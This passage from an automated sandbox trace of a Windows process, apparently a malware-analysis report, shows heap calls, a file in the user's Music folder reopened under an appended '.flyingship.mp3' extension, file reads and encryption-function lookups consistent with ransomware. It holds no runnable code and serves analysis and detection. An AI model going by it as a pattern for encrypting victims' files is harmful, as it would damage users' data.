Size=0x38) returned 0x90af58 [0187.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0187.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\uvlmhuumlbjpgdhq.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0187.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0187.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0187.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.153] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0187.153] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0187.153] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0187.153] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0187.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0187.154] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0187.154] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0187.157] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x2af2, lpOverlapped=0x0) returned 1 [0187.158] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0187.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0187.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12af2) returned 0xbea018 [0187.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0187.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0187.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12af2) returned 0xa5f008 [0187.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0187.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.161] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0187.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12af2) returned 0xbea018 [0187.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0187.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0187.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.174] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0187.174] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0187.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.175] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0187.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12af2) returned 0xbea018 [0187.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0187.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0187.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0187.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0187.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0187.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0187.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12af2) returned 0xa71b08 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0187.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0187.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0187.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0187.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0187.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0187.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.178] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0187.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0187.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0187.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.178] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.179] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0187.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0187.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0187.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0187.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0187.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0187.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0187.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.180] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0187.181] HeapFree 